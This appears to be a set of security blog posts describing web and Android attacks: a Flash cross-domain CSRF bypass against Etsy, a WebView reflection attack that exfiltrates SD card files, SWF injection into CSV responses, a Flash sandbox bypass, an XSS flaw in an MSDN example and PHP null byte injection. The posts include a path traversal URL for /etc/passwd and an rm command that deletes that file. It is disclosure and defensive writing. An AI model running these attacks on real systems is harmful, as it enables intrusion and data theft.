A cross-domain policy file grants a web client such as a Flash application or a Siverlight application the ability to make a cross-domain request and access the response. As in it allows a Flash application on www.evil.com to make a HTTP request to www.bank.com and read the HTTP response, which may allow an attacker to acquire sensitive information (account information, sensitive messages, CSRF tokens, other junk, etc.) assuming the victim is logged into www.bank.com and the target domain defines an overly permissive cross-domain policy file such as the following. For Flash, the master cross-domain policy file will exist in the root directory of the web server (www.bank.com/crossdomain.xml), but it is also possible that policy files exist under other directories as well assuming the permitted-cross-domain-policies attribute is set properly (the default value is now master-only thus preventing the classic “upload text that looks like a cross-domain policy file to a web-based email client” attack). Read the specification for more info.

There are some legitimate use cases for defining a cross-domain policy file that allows requests from any domain. Etsy (popular online marketplace for handmade goods) has created an open API that allows developers to create their own applications that hook into Etsy. There is both a normal JSON interface and a JSONP interface (for cross-domain requests via JavaScript). Etsy clearly wants to allow access cross-domain to their API so their Flash cross-domain policy file (http://openapi.etsy.com/crossdomain.xml) use to look something like the following.

Basically, nothing worth stealing cross-domain, but if we trigger an unhandled exception, the web server returns a HTML response which is suspicious since all the other error messages are provided as plaintext. And, the response contains the CSRF nonce that is associated with www.etsy.com (not good).

So given that openapi.etsy.com has an overly permissive cross-domain policy, which is not a problem in itself in this case, session identifier cookies are overly scoped, and openapi.etsy.com leaks CSRF tokens used on www.etsy.com, it was possible to bypass the CSRF mitigations implemented on www.etsy.com. The following is the basic workflow of the attack.

1) Victim is logged into www.etsy.com (sessions stay active for about 2 years).
2) Victim visits www.attack.com which includes a Flash application embedded in the page.
3) Flash application attempts to make a HTTP request to openapi.etsy.com to trigger the error page that contains a CSRF token.
4) Flash makes a pre-flight request to openapi.etsy.com/crossdomain.xml to determine whether or not the application should be allowed to make the request stated in the previous step.
5) Given that the policy file allows requests from any domain, the HTTP request goes through. Note that the browser sends along the proper cookies associated with etsy.com since the victim is logged in.
6) The Flash application parses the response for the CSRF token and passes the CSRF token to its parent webpage via JavaScript.
7) The parent webpage builds a CSRF payload with the correct CSRF token and auto submits it to www.etsy.com to perform some random task. Note that I built a HTML based CSRF exploit instead of a Flash based CSRF exploit due to restrictions on how the navigateToURL function can be used.

The following is an example exploit written in ActionScript that can be compiled via mxmlc.

Remove the CSRF token from the error page (get rid of the specific information leakage issue).

Change the cross-domain policy for Flash to only allow cross-domain requests from etsy.com subdomains.

Restricting only the Flash cross-domain policy was an interesting choice given the nature of the API and since they did not change the Silverlight cross-domain policy (clientaccesspolicy.xml), which still allows requests from any domain. In this specific case, the server responds with a 400 Bad Request status code, which means that a Siverlight application using the Browser HTTP handling mode would not be able to read the HTTP response regardless of the cross-domain policy (MSDN contains good information about Client vs. Browser mode for Siverlight applications). Flash contains no such restriction for cross-domain requests, which highlights another subtle different between how Flash and Siverlight handle cross-domain requests differently.

Android applications often use the WebView class to embed a browser component within an Activity in order to display online content. For example, the following code will show the Google homepage within an Activity.

An application can inject Java objects into a WebView via the addJavascriptInterface function. This allows JavaScript code to call the public methods of the injected Java object. Exposing Java objects to JavaScript could have some negative security implications, such as allowing JavaScript to invoke native phone functionality (sending SMS to premium numbers, accessing account information, etc.) or allowing JavaScript to subvert existing browser security controls such as the same origin policy. I could not find much information documenting how to exploit these issues, but an academic paper titled Attacks on WebView in the Android System explores a number of attacks and describes a situation in which a file utilities object is exposed to JavaScript code thus allowing attackers to manipulate the file system if an attacker can control any of the content rendered in a WebView via MiTM, JavaScript injection, or redirection attacks.

The paper goes on to state that “in our case studies, 30% Android apps use addJavascriptInterface. How severe the problems of those apps are depends on the types of interfaces they provide and the permissions assigned to them.” The following code exposes the SmokeyBear class to JavaScript, but only declares one public function that returns a string. Is this interface safe to expose?

Probably not. Prior to Android 4.2, if an application uses the addJavascriptInterface and allows an attacker to control the content rendered in a WebView, then an attacker can take control over the parent application regardless of the type of interface exposed contrary to popular belief. Consider the following code that uses reflection to acquire a reference to a Runtime object via the SmokeyBear interface in order to write an ARM executable to the target application’s data directory and then execute it via Linux commands. The executable in this case sends all files stored on the SD card to a remote server (steal photos, videos, and any other data improperly stored on the SD card). This type of payload works against unrooted and rooted devices, since anything on the SD card is world readable and writable. If the attacker wants to break out of the Android application sandbox, an attacker could use this same technique to drop a root exploit onto the device (gingerbreak, rageagainstthecage, zergRush, psneuter, etc.) and then execute it.

Applications targeted to API level 17 (Android 4.2), and above in the future, protect against the previous reflection-based attack by requiring programmers to annotate exposed functions (@JavascriptInterface), and I’m assuming the getClass function is missing this annotation, but currently only 0.8% of devices support API level 17, so we can’t realistically recommend using annotations to prevent this type of attack for a couple years. So, how should we recommend our clients fix the issue?

Use addJavascriptInterface only if the application loads trusted content into the WebView component (Internet || IPC == sketch).

Develop a custom JavaScript bridge using the shouldOverrideUrlLoading function. An application could check the newly loaded URL for a custom URI scheme and respond accordingly, but be careful about what functionality you expose via this custom URI scheme, and use input validation and output encoding to prevent the standard injection attacks.

Reconsider why a bridge between JavaScript and Java is a necessity for this Android application and remove the bridge if feasible.

Assuming an attacker can control the start of a CSV file served up by a web application, what damage could be done? The example PHP code below serves up a basic CSV file, but allows the user to control the column names. Note that the Content-Type header is at least set properly.

This seems like a reasonable approach since the application accepts and uses the columnNames parameter without performing any input validation or output encoding. But, the browser, even our old friend IE, will not render the content as HTML due to the Content-Type header’s value (text/csv). Note that this would be exploitable if the Content-Type header was set to text/plain instead, because IE will perform content sniffing in that situation.

Out of luck? Nope, just inject in an entire SWF file into the columnNames parameter. A SWF’s origin is the domain from which it was retrieved from, similar to a Java applet (uses IP addresses instead of domain names though), therefore a malicious page could embed a SWF, which originates from the target’s domain that could make arbitrary requests to the target domain and read the responses (steal sensitive data, defeat CSRF protections, and other generally nasty actions). But, what about the data in the CSV that we don’t control? The Flash Player will ignore the content following a well formed SWF and execute the SWF properly. The following JavaScript code snippet demonstrates this technique. Since both browsers and HTTP servers impose limits on the length of URLs, I would recommend writing the payload in ActionScript 2 using a command-line compiler like MTASC or an assembler like Flasm in order to craft a small SWF. Sadly, Flex is bloated, so mxmlc is not an option.

Ideally, web applications wouldn’t accept arbitrary content to build a CSV, but the Flash Player could also take steps to prevent this attack from occurring. The following improvements could be made, but will likely break some existing RIAs that fail to set the Content-Type header properly on their SWFs.

1) Refuse to play any SWF that does not have a correct MIME type (application/x-shockwave-flash).
2) Refuse to play any SWF that has erroneous data at the end of the file.

Moral of the story: setting the content type properly is not a substitute for proper input validation.

I suppose I should explain what Adobe refers to as a security control bypass (CVE-2011-2429). There exists a number of different security sandboxes that the Flash Player uses to restrict SWFs. In this case, I was able to create a SWF that bypassed the restrictions imposed by a local-with-filesystem sandbox.

“The local-with-filesystem sandbox–For security purposes, Flash Player places all local SWF files and assets in the local-with-file-system sandbox, by default. From this sandbox, SWF files can read local files (by using the URLLoader class, for example), but they cannot communicate with the network in any way. This assures the user that local data cannot be leaked out to the network or otherwise inappropriately shared.” [1]

Since a SWF placed into the local-with-filesystem sandbox can access local files, all we need to do is figure out a way to “communicate with the network in any way” in order to exfiltrate files off of a victim’s computer. Billy Rios noticed that the getURL function was using protocol black-listing to prevent network communication with the outside world, therefore he used the mhtml psuedo URL scheme, which works in IE, earlier this year to bypass the security restrictions [2]. When I tried to reproduce his research, I received an annoying security exception from the Flash Player, so I searched for other pseudo URL schemes that might be useful, since I noticed that the Flash Player continued to simply black-list protocols as opposed to implementing some sort of white-list of acceptable protocols. I quickly came across the view-source pseudo URL scheme that appeared to achieve similar results in Firefox and Chrome. The view-source scheme is used to *gasp* view the source of a resource, and you’ll notice that both browsers will make a new HTTP request to retrieve the resource if the resource has not been cached yet.

The proof of concept is fairly simplistic, and there is technically a file size restriction on the files that can be extracted from the target’s machine due to browser restrictions on the URL length, but it might be possible to bypass this restriction by using custom HTTP headers to transfer the file contents instead, or using a different technique. The screenshot below shows the PoC SWF in action stealing some s3cr3t filez.

Searching for “how to prevent cross site scripting in .NET” in Google produces a number of interesting results. The first link points to a MSDN article titled How To: Prevent Cross-Site Scripting in ASP.NET, but this article includes the following code snippet, which “uses HtmlEncode to ensure the inserted text is safe”, but this code is clearly vulnerable upon further inspection.

In this example, it is crucial to understand, which characters the Server.HtmlEncode function actually encodes, and understand the context in which the application injects the user input. The application accepts user input and uses the input to build an inline style for a span element. In this context, a malicious user could inject in JavaScript without the use of single quotes, or double quotes as demonstrated by the following examples.

While the MSDN article remains popular, Microsoft has chosen not to maintain this documentation, which is a shame because most of the content is fairly informative for developers attempting to secure their code. Anyways, don’t believe everything you read and please use the Anti-XSS library instead of the Server.HtmlEncode function.

Attackers have commonly used the null character to bypass file extension restrictions during the exploitation of local file inclusion vulnerabilities. rain.forest.puppy outlined this type of attack against Perl-based CGI applications in Phrack issue 55 over ten years ago, but the problem has also affected web applications written in other higher-level languages such as Java, .NET, and PHP. Consider the following insecure PHP code.

Clearly, an attacker could abuse the poorly written application to include arbitrary TXT files stored on the web server, which is certainly not good, but until fairly recently an attacker could also include any file regardless of the extension. Consider the following request an attacker could make to exploit the vulnerability and acquire the server’s password file.

http://www.victim.com/page.php?filename=../../etc/passwd%00

The developers of PHP addressed this issue in version 5.3.4 late last year, and “paths with NULL in them (foo\0bar.txt) are now considered as invalid.” Finally, the file_exists function operates how most programmers would expect it to function. File systems, at least NTFS and most Unix file systems, do not allow the null character to appear within a file name, although many other control characters are permitted within file names.

So can we finally stop worrying about null bytes in PHP? Not really, the null byte character can still cause issues in a number of other situations. Consider an application that performs rudimentary input validation to prevent command injection, but still allows the user to type in something like ../etc/passwd\0. Same problem, different function.

// Guess what file gets deleted?
exec("rm /tmp/../etc/passwd\0.tmp");

Attackers could also use null byte characters to bypass black-list filters designed to mitigate the risk of cross-site scripting attacks by blocking specific HTML or JavaScript keywords. Applications should avoid relying on black-listing to prevent attacks, but Internet Explorer complicates the situation, since IE essentially ignores null byte characters in every single context while rendering HTML, and JavaScript, and therefore we can easily craft a payload like the following to bypass black-list filters that attempts to sanitize input. Luckily, other browsers simply ignore the null byte shenanigans and the JavaScript fails to execute.

This example also illustrates one way of bypassing IE8's XSS filter, since the parameter value in the request will not exactly match the parameter value reflected in the response, which is accomplished by adding in an erroneous <blah> element inside of a bogus HTML attribute, since we know the application will attempt to sanitize the input as opposed to outright blocking the malicious request. Another way to ensure that the request signature will not match the response signature, and bypass the IE’s XSS filter, is to abuse applications that perform output encoding on some characters, such as double quotes, but fail to encode all relevant characters, such as single quotes. But, I digress...

At the end of the day, null byte characters will continue to cause security issues when software written in higher-level language pass unvalidated user input to software written in C/C++ or assembly. Higher-level languages such as Java, PHP, Perl, and .NET place no special meaning in a null character, while the null character is used as the string termination character in lower level languages, therefore this mismatch of data representation of strings will often adversely affect security. Pascal style strings are sounding like a good idea again 🙂